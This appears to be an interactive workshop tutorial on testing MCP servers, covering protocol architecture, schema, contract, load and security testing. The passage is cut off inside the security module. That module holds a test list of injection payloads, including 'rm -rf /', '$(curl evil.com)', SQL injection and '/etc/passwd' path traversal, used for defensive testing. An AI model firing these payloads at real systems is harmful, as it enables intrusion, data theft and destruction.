Interactive Tutorial

Testing & Validating MCP Servers

Welcome to the Workshop

This comprehensive tutorial is designed for QA Engineers and SDETswho want to master testing the Model Context Protocol (MCP). Whether you're transitioning from REST API testing or expanding your skillset into AI infrastructure, this workshop provides hands-on, production-grade knowledge.

What You'll Learn

  • Deep understanding of MCP architecture and protocol mechanics
  • Comprehensive test strategies specific to MCP servers
  • Hands-on implementation of functional, contract, and performance tests
  • Security testing techniques for AI tool orchestration
  • Real-world project: Build and test your own MCP server
  • Advanced observability and CI/CD integration patterns

Prerequisites

  • 2-8 years of QA/SDET experience
  • Strong understanding of REST APIs and JSON
  • Familiarity with automation frameworks (Pytest, Playwright, or REST Assured)
  • Basic knowledge of CI/CD pipelines
  • Understanding of test design principles
⏱ Duration

This workshop takes approximately 3-4 hours to complete. Each module builds on the previous one, so we recommend following the sequence.

Workshop Structure

Module Topic Duration
Module 1 Foundations of MCP 45 min
Module 2 QA & SDET Test Strategy 60 min
Module 3 Hands-On Project 75 min
Module 4 Advanced SDET Architecture 30 min
Assessment Final Quiz 20 min
🎯 Learning Approach

This tutorial emphasizes hands-on practice. You'll find interactive exercises, real code examples, and practical scenarios throughout. Don't just readβ€”experiment with the code and concepts !

Module 1.1

What is MCP?

Formal Definition

Model Context Protocol (MCP)is an open protocol that standardizes how applications provide context to Large Language Models (LLMs). It enables AI applications to securely connect to diverse data sources and tools through a unified interface, solving the fragmentation problem in AI tool integration.

Why MCP Exists

Before MCP, every AI application built custom integrations for each tool, database, or API:

❌ THE OLD WAY: Claude App β†’ Custom Slack Integration Claude App β†’ Custom GitHub Integration Claude App β†’ Custom Database Integration ChatGPT β†’ Different Custom Integrations (no reuse)

Problems this created:

  • Duplicate engineering effort across every AI platform
  • No standardization or interoperability
  • Security inconsistencies between implementations
  • Difficult to maintain and version
  • Zero code reuse between platforms
βœ… WITH MCP: Any AI App β†’ MCP Protocol β†’ MCP Server (Slack) Any AI App β†’ MCP Protocol β†’ MCP Server (GitHub) Any AI App β†’ MCP Protocol β†’ MCP Server (Database)

The N Γ— M Problem

MCP solves the fundamental scaling problem in AI tool integration:

  • Without MCP:N AI applications Γ— M tools=NΓ—M custom integrations
  • With MCP:N clients+M servers=N+M implementations
πŸ’‘ Key Insight for QA

This architectural shift means you're no longer testing just API endpointsβ€”you' re testing a bidirectional protocolwith dynamic capability negotiation, persistent sessions, and stateful interactions.

MCP vs REST/GraphQL

Aspect REST/GraphQL MCP
Purpose General API communication LLM-context delivery
Discovery Static OpenAPI/Schema Dynamic capability negotiation
Session Model Stateless (REST) Persistent bidirectional session
Tool Schema Not standardized JSON Schema for tools
Transport HTTP only stdio, HTTP+SSE, WebSocket
Context Flow Request β†’ Response Resources+Tools+Prompts

Real-World Use Cases

1. Enterprise Knowledge Assistant

MCP Server connects to: β”œβ”€β”€ Confluence (documentation) β”œβ”€β”€ JIRA (project tracking) β”œβ”€β”€ Slack (team communication) └── Git (code repositories) AI can query across all systems simultaneously. QA Challenge:Validate cross-system data consistency

2. DevOps AI Agent

MCP Server exposes tools for: β”œβ”€β”€ Deploy application β”œβ”€β”€ Rollback deployment β”œβ”€β”€ Check logs └── Monitor metrics AI orchestrates the entire deployment pipeline. QA Challenge:Test rollback scenarios and error handling

3. Customer Support Bot

MCP Server provides access to: β”œβ”€β”€ CRM data (customer history) β”œβ”€β”€ Ticketing API (support tickets) └── Knowledge base (solutions) AI resolves tickets with full context. QA Challenge:Validate PII handling and security boundaries

πŸ§ͺ Reflection Exercise

Question:Think about your current testing work. What's one API or system you test that could benefit from MCP standardization?

Consider:

  • How would dynamic capability negotiation change your test approach?
  • What new test scenarios would emerge?
  • How would stateful sessions impact your test data management?
Module 1.2

MCP Architecture Deep Dive

High-Level Architecture

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚                                                             β”‚
β”‚    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”           β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”                β”‚
β”‚    β”‚             β”‚           β”‚             β”‚                β”‚
β”‚    β”‚  AI Client  β”‚ ◄───────► β”‚ MCP Server  β”‚                β”‚
β”‚    β”‚   (Claude)  β”‚    MCP    β”‚             β”‚                β”‚
β”‚    β”‚             β”‚  Protocol β”‚             β”‚                β”‚
β”‚    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜           β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”˜                β”‚
β”‚                                     β”‚                       β”‚
β”‚           β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”     β”‚
β”‚           β”‚                         β”‚                 β”‚     β”‚
β”‚       β”Œβ”€β”€β”€β–Όβ”€β”€β”€β”                 β”Œβ”€β”€β”€β–Όβ”€β”€β”€β”         β”Œβ”€β”€β”€β–Όβ”€β”€β”€β” β”‚
β”‚       β”‚ Tools β”‚                 β”‚Resourcesβ”‚       β”‚Promptsβ”‚ β”‚
β”‚       β”‚       β”‚                 β”‚       β”‚         β”‚       β”‚ β”‚
β”‚       β”‚β€’ calc β”‚                 β”‚β€’ filesβ”‚         β”‚β€’ expl β”‚ β”‚
β”‚       β”‚β€’ API  β”‚                 β”‚β€’ DB   β”‚         β”‚β€’ fix  β”‚ β”‚
β”‚       β””β”€β”€β”€β”€β”€β”€β”€β”˜                 β””β”€β”€β”€β”€β”€β”€β”€β”˜         β””β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚
β”‚                                                             β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Protocol Components

1. Client (AI Application)

  • Initiates connection to MCP server
  • Discovers available capabilities
  • Invokes tools and fetches resources
  • Manages session lifecycle

2. MCP Server

  • Exposes tools, resources, and prompts
  • Handles capability negotiation
  • Executes tool requests
  • Manages state and context

3. Transport Layer

MCP supports three transport mechanisms:

Transport Use Case Testing Focus
stdio Local processes Process lifecycle, I/O streams
HTTP+SSE Remote servers Connection handling, retries
WebSocket Real-time bidirectional Connection stability, reconnection

Request Lifecycle Walkthrough

Step 1: Connection Initialization Client β†’ Server: Initialize request Server β†’ Client: Server capabilities Step 2: Capability Discovery Client β†’ Server: List available tools Server β†’ Client: Tool schemas Step 3: Tool Invocation Client β†’ Server: Call tool with parameters Server: Execute tool logic Server β†’ Client: Return result Step 4: Error Handling (if needed) Server β†’ Client: Error response with details

Example: Initialize Request

 {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "initialize",
            "params": {

                "protocolVersion": "2024-11-05",
                "capabilities": {
                    "roots": {
                        "listChanged": true
                    }

                    ,
                    "sampling": {}
                }

                ,
                "clientInfo": {
                    "name": "TestClient",
                        "version": "1.0.0"
                }
            }
        }

        

Example: Server Response

 {

            "jsonrpc": "2.0",
            "id": 1,
            "result": {

                "protocolVersion": "2024-11-05",
                "capabilities": {
                    "logging": {}

                    ,
                    "prompts": {
                        "listChanged": true
                    }

                    ,
                    "resources": {
                        "subscribe": true,
                            "listChanged": true
                    }

                    ,
                    "tools": {
                        "listChanged": true
                    }
                }

                ,
                "serverInfo": {
                    "name": "ExampleServer",
                        "version": "1.0.0"
                }
            }
        }

        
πŸ” Testing Insight

The initialization handshake is critical. Your tests must validate:

  • Protocol version compatibility
  • Capability negotiation correctness
  • Proper error handling for mismatched versions
  • Timeout behavior for unresponsive servers

Data Flow Architecture

Request Flow: ════════════ Client MCP Server Backend β”‚ β”‚ β”‚ β”‚ 1. List Tools β”‚ β”‚ β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”‚ β”‚ β”‚ β”‚ β”‚ β”‚ 2. Tool Schemas β”‚ β”‚ │◄─────────────────────────── β”‚ β”‚ β”‚ β”‚ β”‚ 3. Call Tool(params) β”‚ β”‚ β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”‚ β”‚ β”‚ β”‚ 4. Execute Logic β”‚ β”‚ β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”‚ β”‚ β”‚ β”‚ β”‚ β”‚ 5. Return Data β”‚ β”‚ │◄────────────────────── β”‚ 6. Tool Result β”‚ β”‚ │◄─────────────────────────── β”‚ β”‚ β”‚ β”‚
πŸ§ͺ Architecture Challenge

Scenario:An MCP server connects to three different databases: PostgreSQL, MongoDB, and Redis.

Questions:

  1. How would you test connection failure to one database while others succeed?
  2. What happens if the MCP server crashes mid-request? How should your tests detect this?
  3. If the client disconnects, should the MCP server clean up database connections immediately or wait?

Think About:Connection pooling, resource cleanup, graceful degradation

Module 1.3

Key MCP Concepts

Core Primitives

MCP defines three primary primitives that servers can expose:

1. Tools

Definition:Executable functions that the AI can call to perform actions or retrieve computed data.

 {

            "name": "calculate_discount",
            "description": "Calculate discounted price based on original price and discount percentage",
            "inputSchema": {

                "type": "object",
                "properties": {
                    "original_price": {
                        "type": "number",
                            "description": "Original price before discount"
                    }

                    ,
                    "discount_percent": {
                        "type": "number",
                            "description": "Discount percentage (0-100)",
                            "minimum": 0,
                            "maximum": 100
                    }
                }

                ,
                "required": ["original_price",
                "discount_percent"]
            }
        }

        

Testing Focus:

  • Schema validation (are all required fields defined?)
  • Input boundary testing (min/max values)
  • Type validation (what if a string is passed for a number?)
  • Required field enforcement

2. Resources

Definition:Data sources that provide context to the AI, such as files, database queries, or API responses.

 {
            "uri": "file:///docs/api-reference.md",
                "name": "API Reference Documentation",
                "description": "Complete API documentation for the product",
                "mimeType": "text/markdown"
        }

        

Testing Focus:

  • URI format validation
  • Resource availability (404 handling)
  • MIME type correctness
  • Large resource handling (timeouts, streaming)

3. Prompts

Definition:Reusable prompt templates that guide AI interactions.

 {

            "name": "code_review",
            "description": "Review code for bugs and improvements",
            "arguments": [ {
                "name": "code",
                    "description": "Code to review",
                    "required": true
            }

            ,
            {
            "name": "language",
                "description": "Programming language",
                "required": true
        }

        ]
        }

        

Tool Execution Example

Request: Calling a Tool

 {

            "jsonrpc": "2.0",
            "id": 2,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100.00,
                        "discount_percent": 20
                }
            }
        }

        

Response: Successful Execution

 {

            "jsonrpc": "2.0",
            "id": 2,
            "result": {
                "content": [ {
                    "type": "text",
                        "text": "Discounted price: $80.00 (20% off $100.00)"
                }

                ]
            }
        }

        

Response: Error Case

 {

            "jsonrpc": "2.0",
            "id": 2,
            "error": {

                "code": -32602,
                "message": "Invalid params",
                "data": {
                    "details": "discount_percent must be between 0 and 100, got 150"
                }
            }
        }

        

Error Handling Strategy

Error Code Meaning Test Scenario
-32700 Parse error Send malformed JSON
-32600 Invalid request Missing required fields
-32601 Method not found Call non-existent tool
-32602 Invalid params Wrong parameter types
-32603 Internal error Server crash simulation
⚠️ Critical Testing Point

Error codes must be consistent and predictable. Your test suite should verify that the server returns the correct error code for each failure scenario. Don't just check that an error occurredβ€”validate the specific error code and message.

Edge Cases to Test

1. Boundary Values- Maximum string length - Minimum/maximum numbers - Empty arrays - Null values 2. Type Coercion- String "100" vs number 100 - Boolean true vs string "true"

        - undefined vs null 3. Unicode and Special Characters- Emoji in tool names - Non-ASCII characters - Control characters 4. Concurrent Requests- Multiple tool calls simultaneously - Race conditions in stateful operations - Resource locking 5. Timeout Scenarios- Long-running tool execution - Network delays - Database query timeouts

πŸ§ͺ Practice: Schema Validation

Consider this tool schema:

 {

            "name": "send_email",
            "inputSchema": {

                "type": "object",
                "properties": {
                    "to": {
                        "type": "string", "format": "email"
                    }

                    ,
                    "subject": {
                        "type": "string", "maxLength": 100
                    }

                    ,
                    "body": {
                        "type": "string"
                    }

                    ,
                    "attachments": {

                        "type": "array",
                        "items": {
                            "type": "string"
                        }

                        ,
                        "maxItems": 5
                    }
                }

                ,
                "required": ["to",
                "subject",
                "body"]
            }
        }

        

Design 5 test cases:

  1. One positive test case
  2. Four negative test cases targeting different validation rules

Hint:Think about email format, length limits, required fields, and array constraints.

Module 2.1

What Must Be Tested?

Comprehensive Testing Checklist

Testing an MCP server requires a multi-layered approach. Unlike REST APIs where you primarily test endpoints, MCP testing involves protocol compliance, capability negotiation, and stateful interactions.

1. Tool Registration Validation

What to verify:

  • All tools are properly registered during initialization
  • Tool schemas match JSON Schema specification
  • Tool names are unique and follow naming conventions
  • Descriptions are clear and accurate
Test Case: Duplicate Tool Names Given: MCP server with two tools named "calculate"

        When: Server initializes Then: Should reject with error OR rename with suffix Expected: Clear error message indicating duplicate tool name

2. Schema Validation

Critical validations:

Validation Type Test Approach Example
Type Checking Pass wrong types String instead of number
Required Fields Omit required params Missing "email" field
Format Validation Invalid formats "not-an-email" for email field
Range Validation Boundary testing 101 for 0-100 range
Pattern Matching Regex violations "ABC" for "[0-9]+" pattern

3. Capability Exposure

During initialization, servers declare their capabilities. Test that:

 {
            "capabilities": {
                "logging": {}

                ,
                // Can send logs to client
                "prompts": {
                    // Can provide prompts
                    "listChanged": true // Notifies on prompt list changes
                }

                ,
                "resources": {
                    // Can provide resources
                    "subscribe": true, // Supports resource subscriptions
                        "listChanged": true // Notifies on resource list changes
                }

                ,
                "tools": {
                    // Can provide tools
                    "listChanged": true // Notifies on tool list changes
                }
            }
        }

        

Test scenarios:

  • Server claims "tools" capability β†’ Must respond to tools/list
  • Server claims "listChanged: true" β†’ Must emit notifications
  • Server lacks "resources" capability β†’ Must reject resources/list

4. Tool Execution Logic

The core functional testing area:

For each tool,
        test: βœ“ Happy Path- Valid inputs - Expected outputs - Correct data types in response βœ“ Edge Cases- Boundary values (min/max) - Empty inputs - Null/undefined values - Special characters βœ“ Error Conditions- Invalid inputs - Missing required fields - Type mismatches - Business logic violations βœ“ State Management- Does tool modify state? - Can it be called repeatedly? - Are state changes idempotent?

5. Error Handling Behavior

🎯 Testing Principle

Good error handling is predictable, informative, and consistent. Every error should return:

  • Correct error code
  • Clear error message
  • Actionable details (what went wrong, how to fix)
  • No sensitive information leakage

6. Timeout Behavior

Test how the server handles long-running operations:

Scenario 1: Tool execution exceeds timeout Given: Tool takes 60s to execute When: Client timeout is 30s Then: Client receives timeout error And: Server should cancel/cleanup the operation Scenario 2: Network timeout Given: Client-server connection is unstable When: Request is sent Then: Implement retry logic OR fail gracefully Scenario 3: Database query timeout Given: Tool queries slow database When: Query exceeds timeout Then: Return specific timeout error And: Don't crash the server

7. Concurrency Handling

MCP servers must handle multiple simultaneous requests:

Test Type Scenario Expected Behavior
Parallel Tools Call 10 different tools simultaneously All succeed independently
Same Tool Call same tool 10 times concurrently All execute correctly, no race conditions
Resource Lock Two tools accessing same database Proper locking, no deadlocks
State Modification Concurrent writes to shared state Consistent final state

8. State Management

Questions to answer through testing:

  • Is the server stateful or stateless?
  • How is session state maintained?
  • What happens if the client reconnects?
  • Are there memory leaks with long-running sessions?
  • How is state cleaned up after client disconnection?

9. Backward Compatibility

As servers evolve, test that changes don't break existing clients:

Version 1.0: {

            "name": "get_user",
            "params": {
                "user_id": "string"
            }
        }

        Version 2.0: {

            "name": "get_user",
            "params": {
                "user_id": "string",
                    "include_metadata": "boolean" // NEW optional field
            }
        }

        Test:V1 client calling V2 server should still work
πŸ§ͺ Design a Test Suite

Scenario:You're testing an MCP server that exposes a "weather_forecast" tool.

 {

            "name": "weather_forecast",
            "inputSchema": {

                "type": "object",
                "properties": {
                    "location": {
                        "type": "string"
                    }

                    ,
                    "days": {
                        "type": "integer", "minimum": 1, "maximum": 7
                    }

                    ,
                    "units": {
                        "type": "string", "enum": ["celsius", "fahrenheit"]
                    }
                }

                ,
                "required": ["location",
                "days"]
            }
        }

        

Your Task:List 10 specific test cases covering:

  • 3 positive tests
  • 5 negative tests
  • 2 edge case tests
Module 2.2

Functional Testing Strategy

Test Case Design Framework

Functional testing for MCP servers follows a structured approach that goes beyond simple API testing. You're validating protocol compliance, tool behavior, and integration logic.

Test Case Template

Field Description Example
Test ID Unique identifier MCP-TC-001
Category Type of test Tool Execution
Priority Critical/High/Medium/Low Critical
Preconditions Setup requirements Server initialized
Test Steps Detailed actions 1. Call tool 2. Verify response
Test Data Input parameters { "price": 100, "discount": 20 }
Expected Result What should happen Returns discounted price $80
Actual Result What actually happened Pass/Fail with details

Comprehensive Test Scenarios

Example: Testing "calculate_discount" Tool

Test ID Scenario Input Expected Output Type
TC-001 Valid calculation price: 100, discount: 20 80.00 Positive
TC-002 Zero discount price: 100, discount: 0 100.00 Boundary
TC-003 100% discount price: 100, discount: 100 0.00 Boundary
TC-004 Negative price price: -50, discount: 20 Error: Invalid price Negative
TC-005 Discount>100 price: 100, discount: 150 Error: Invalid discount Negative
TC-006 Missing field price: 100 Error: Missing discount Negative
TC-007 Wrong type price: "hundred", discount: 20 Error: Invalid type Negative
TC-008 Decimal precision price: 99.99, discount: 33.33 66.66 Edge Case
TC-009 Very large number price: 999999999, discount: 50 499999999.50 Edge Case
TC-010 Extra fields price: 100, discount: 20, extra: "test" 80.00 (ignore extra) Edge Case

Validation Checklist

For Every Tool Test:β–‘ Response Structure βœ“ Correct JSON-RPC format βœ“ Proper ID matching request βœ“ Result or error field (not both) β–‘ Data Validation βœ“ Correct data types βœ“ Required fields present βœ“ Enum values valid βœ“ Format specifications met β–‘ Error Handling βœ“ Appropriate error code βœ“ Clear error message βœ“ Error details provided βœ“ No stack traces to client β–‘ Performance βœ“ Response time < threshold βœ“ No memory leaks βœ“ Proper resource cleanup β–‘ Side Effects βœ“ State changes as expected βœ“ Idempotency maintained βœ“ No unintended modifications

Positive vs Negative Testing

Positive Tests (Expected Success)

# Example: Pytest test case def test_calculate_discount_valid_input(): "" "Test discount calculation with valid inputs" ""

        request= {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100.00,
                        "discount_percent": 20
                }
            }
        }

        response=client.send(request) assert response["jsonrpc"]=="2.0"
        assert response["id"]==1 assert "result" in response assert response["result"]["content"][0]["text"]=="Discounted price: $80.00" 

Negative Tests (Expected Failure)

def test_calculate_discount_invalid_discount(): "" "Test that discount > 100 returns error" ""

        request= {

            "jsonrpc": "2.0",
            "id": 2,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100.00,
                        "discount_percent": 150 # Invalid !
                }
            }
        }

        response=client.send(request) assert "error" in response assert response["error"]["code"]==-32602 # Invalid params assert "must be between 0 and 100" in response["error"]["message"]

Schema Validation Examples

import jsonschema def test_tool_schema_compliance(): "" "Verify tool schema is valid JSON Schema" ""

        tool_schema= {

            "name": "send_notification",
            "inputSchema": {

                "type": "object",
                "properties": {
                    "message": {
                        "type": "string", "maxLength": 500
                    }

                    ,
                    "priority": {
                        "type": "string", "enum": ["low", "medium", "high"]
                    }

                    ,
                    "recipients": {

                        "type": "array",
                        "items": {
                            "type": "string", "format": "email"
                        }

                        ,
                        "minItems": 1,
                        "maxItems": 10
                    }
                }

                ,
                "required": ["message",
                "recipients"]
            }
        }

        # Validate the schema itself is valid JSON Schema try: jsonschema.Draft7Validator.check_schema(tool_schema["inputSchema"]) except jsonschema.SchemaError as e: pytest.fail(f"Invalid schema: {e}") # Test valid input valid_input= {
            "message": "Test notification",
                "priority": "high",
                "recipients": ["[email protected]"]
        }

        jsonschema.validate(valid_input, tool_schema["inputSchema"]) # Test invalid input invalid_input= {
            "message": "x" * 501, # Exceeds maxLength "recipients": [] # Violates minItems
        }

        with pytest.raises(jsonschema.ValidationError): jsonschema.validate(invalid_input, tool_schema["inputSchema"])

πŸ§ͺ Build Your Test Matrix

Tool Specification:

 {

            "name": "create_user",
            "inputSchema": {

                "type": "object",
                "properties": {
                    "username": {
                        "type": "string",
                        "pattern": "^[a-z0-9_]{3,20}$"
                    }

                    ,
                    "email": {
                        "type": "string",
                            "format": "email"
                    }

                    ,
                    "age": {
                        "type": "integer",
                            "minimum": 18,
                            "maximum": 120
                    }

                    ,
                    "role": {
                        "type": "string",
                            "enum": ["user", "admin", "moderator"]
                    }
                }

                ,
                "required": ["username",
                "email"]
            }
        }

        

Task:Create a complete test matrix with:

  • At least 5 positive test cases
  • At least 8 negative test cases
  • 3 boundary value tests

Think about:Pattern matching, email validation, integer boundaries, enum values, required fields

Module 2.3

Contract Testing

What is Contract Testing?

Contract testing verifies that the MCP server adheres to its published interface contract. Unlike functional testing (which tests behavior), contract testing ensures the API structure, data types, and protocol compliance remain consistent across versions.

🎯 Key Principle

Contract tests answer: "Does the server do what it promised in its schema?"

Why Contract Testing Matters for MCP

  • Version Compatibility:Clients depend on stable contracts
  • Breaking Change Detection:Catch incompatible changes early
  • Documentation Validation:Ensure docs match reality
  • Consumer-Driven:Protect clients from server changes

JSON Schema Validation

Tool Schema Contract

import jsonschema import pytest def test_tool_list_contract(): "" "Verify tools/list response matches expected contract" ""

        # Expected contract for tools/list response expected_schema= {

            "type": "object",
            "properties": {
                "jsonrpc": {
                    "const": "2.0"
                }

                ,
                "id": {
                    "type": ["number", "string"]
                }

                ,
                "result": {

                    "type": "object",
                    "properties": {
                        "tools": {

                            "type": "array",
                            "items": {

                                "type": "object",
                                "properties": {
                                    "name": {
                                        "type": "string"
                                    }

                                    ,
                                    "description": {
                                        "type": "string"
                                    }

                                    ,
                                    "inputSchema": {
                                        "type": "object"
                                    }
                                }

                                ,
                                "required": ["name",
                                "inputSchema"]
                            }
                        }
                    }

                    ,
                    "required": ["tools"]
                }
            }

            ,
            "required": ["jsonrpc",
            "id",
            "result"]
        }

        # Make actual request response=client.list_tools() # Validate against contract try: jsonschema.validate(response, expected_schema) except jsonschema.ValidationError as e: pytest.fail(f"Contract violation: {e.message}")

Snapshot Testing

Snapshot testing captures the current API response and compares future responses against it. This catches unintended changes.

import json import pytest def test_calculate_discount_response_snapshot(snapshot): "" "Ensure response structure hasn't changed" ""

        request= {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100, "discount_percent": 20
                }
            }
        }

        response=client.send(request) # Remove dynamic fields for comparison response_snapshot= {

            "jsonrpc": response["jsonrpc"],
            "id": response["id"],
            "result": {
                "content": response["result"]["content"]
            }
        }

        # Compare with stored snapshot snapshot.assert_match(json.dumps(response_snapshot, indent=2), "discount_response.json")

Protocol Versioning Impact

Change Type Breaking? Contract Test Strategy
Add new tool ❌ No Verify tool list grows
Remove existing tool βœ… Yes Block in CI/CD
Add optional parameter ❌ No Verify backward compatibility
Add required parameter βœ… Yes Block in CI/CD
Change parameter type βœ… Yes Block in CI/CD
Change error code βœ… Yes Version bump required

Consumer-Driven Contract Testing

In consumer-driven testing, clients define their expectations (contracts), and the server must satisfy them.

# consumer_contract.yaml interactions: - description: Calculate discount for valid input request: method: tools/call params: name: calculate_discount arguments: original_price: 100 discount_percent: 20 response: status: success body: matchingRules: "$.result.content[0].type": {
            match: "type", value: "string"
        }

        "$.result.content[0].text": {
            match: "regex",
            regex: "Discounted price: \\$\\d+\\.\\d{2}"
        }

        

πŸ§ͺ Practice: Define a Contract

Scenario:You're testing a "currency_converter" tool.

 {

            "name": "currency_converter",
            "inputSchema": {

                "type": "object",
                "properties": {
                    "amount": {
                        "type": "number", "minimum": 0
                    }

                    ,
                    "from_currency": {
                        "type": "string",
                        "pattern": "^[A-Z]{3}$"
                    }

                    ,
                    "to_currency": {
                        "type": "string",
                        "pattern": "^[A-Z]{3}$"
                    }
                }

                ,
                "required": ["amount",
                "from_currency",
                "to_currency"]
            }
        }

        

Task:Write a JSON Schema that validates the response structure for this tool. Consider:

  • What fields should be in the result?
  • What data types should they have?
  • What fields are required vs optional?
Module 2.4

Performance & Load Testing

Performance Testing for MCP Servers

Performance testing validates that your MCP server can handle expected load while maintaining acceptable response times and resource usage.

Key Performance Metrics

Metric Description Target
Response Time Time from request to response < 100ms (p95)
Throughput Requests per second 100+RPS
Latency (p99) 99th percentile response time < 500ms
Error Rate Failed requests percentage < 0.1%
CPU Usage Server CPU consumption < 70%
Memory Usage RAM consumption No leaks

Throughput Validation

Test how many requests the server can handle per second:

import asyncio import time from concurrent.futures import ThreadPoolExecutor async def load_test_throughput(): "" "Test server throughput with concurrent requests" ""

        num_requests=1000 concurrent_workers=50 start_time=time.time() async def make_request(): request= {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100, "discount_percent": 20
                }
            }
        }

        return await client.send_async(request) # Execute concurrent requests tasks=[make_request() for _ in range(num_requests)] results=await asyncio.gather(*tasks, return_exceptions=True) end_time=time.time() duration=end_time - start_time # Calculate metrics successful=sum(1 for r in results if not isinstance(r, Exception)) failed=num_requests - successful throughput=num_requests / duration print(f"Total requests: {num_requests}") print(f"Successful: {successful}") print(f"Failed: {failed}") print(f"Duration: {duration:.2f}s") print(f"Throughput: {throughput:.2f} req/s") assert throughput>=100,
        f"Throughput {throughput} below target"
        assert failed / num_requests < 0.001,
        f"Error rate too high" 

Latency Benchmarking

import numpy as np def test_latency_percentiles(): "" "Measure response time distribution" ""

        num_samples=100 response_times=[] for i in range(num_samples): start=time.time() response=client.send({

            "jsonrpc": "2.0",
            "id": i,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100, "discount_percent": 20
                }
            }
        }) end=time.time() response_times.append((end - start) * 1000) # Convert to ms # Calculate percentiles p50=np.percentile(response_times, 50) p95=np.percentile(response_times, 95) p99=np.percentile(response_times, 99) print(f"Response Time Distribution:") print(f"  p50 (median): {p50:.2f}ms") print(f"  p95: {p95:.2f}ms") print(f"  p99: {p99:.2f}ms") # Assertions assert p95 < 100,
        f"p95 latency {p95}ms exceeds 100ms target"
        assert p99 < 500,
        f"p99 latency {p99}ms exceeds 500ms target" 

Concurrent Tool Invocation Tests

def test_concurrent_same_tool(): "" "Test calling the same tool concurrently" ""

        num_concurrent=20 with ThreadPoolExecutor(max_workers=num_concurrent) as executor: futures=[] for i in range(num_concurrent): future=executor.submit(client.send,
            {

            "jsonrpc": "2.0",
            "id": i,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100 + i,
                    "discount_percent": 20
                }
            }
        }) futures.append(future) # Wait for all to complete results=[f.result(timeout=10) for f in futures] # Verify all succeeded for result in results: assert "result" in result,
        "Request failed"
        assert "error" not in result def test_concurrent_different_tools(): "" "Test calling different tools concurrently" ""

        tools=["calculate_discount",
        "currency_converter",
        "weather_forecast"] with ThreadPoolExecutor(max_workers=len(tools)) as executor: futures= {
            executor.submit(call_tool, tool): tool for tool in tools
        }

        for future in futures: tool_name=futures[future] try: result=future.result(timeout=5) assert "result" in result except Exception as e: pytest.fail(f"Tool {tool_name} failed: {e}")

Resource Exhaustion Tests

Test 1: Memory Leak Detection- Monitor memory usage over 1000+requests - Memory should remain stable - No continuous growth pattern Test 2: Connection Pool Exhaustion- Open 100+concurrent connections - Verify server handles gracefully - Check for connection timeout errors Test 3: Large Payload Handling- Send tool calls with 1MB+parameters - Verify server doesn't crash
 - Check memory cleanup after processing Test 4: Rapid Connect/Disconnect- Connect and disconnect 50 times rapidly - Check for resource leaks - Verify cleanup happens correctly

πŸ§ͺ Design a Load Test

Scenario:Your MCP server will be used by 100 concurrent AI agents, each making 10 tool calls per minute.

Calculate:

  • What's the expected requests per second?
  • What's a reasonable p95 latency target?
  • How would you simulate this load?

Design:Write pseudocode for a load test that validates this scenario.

Module 2.5

Security Testing

Security Testing for MCP Servers

Security testing is critical for MCP servers because they often have access to sensitive data, APIs, and can execute arbitrary operations. As a QA engineer, you must validate security boundaries.

⚠️ Security First

MCP servers are privileged components in AI systems. A compromised server can leak data, corrupt systems, or enable unauthorized actions. Security testing is not optional.

Threat Model for MCP Servers

Threat Attack Vector Test Strategy
Prompt Injection Malicious input in tool parameters Inject commands in strings
Schema Poisoning Manipulated tool schemas Send malformed schemas
Data Exfiltration Unauthorized data access Test access controls
Privilege Escalation Bypass authorization checks Attempt restricted operations
DoS/Resource Exhaustion Overwhelming requests Send massive payloads

1. Prompt Injection Testing

Test if malicious input can manipulate server behavior:

def test_prompt_injection_attempts(): "" "Test various prompt injection techniques" ""

        injection_payloads=[ # Command injection "; rm -rf /",
        "$(curl evil.com)",

        # SQL injection patterns "'; DROP TABLE users; --",
        "1' OR '1'='1",

        # Path traversal "../../../etc/passwd",
        "....//....//....//etc/passwd",

        # Script injection "<script>alert('XSS')</script>",
        "javascript:alert(1)",

        # Template injection "{{7*7}}",
        "${7*7}",

        # LDAP injection "*)(uid=*))(|(uid=*",
        ] for payload in injection_payloads: request= {

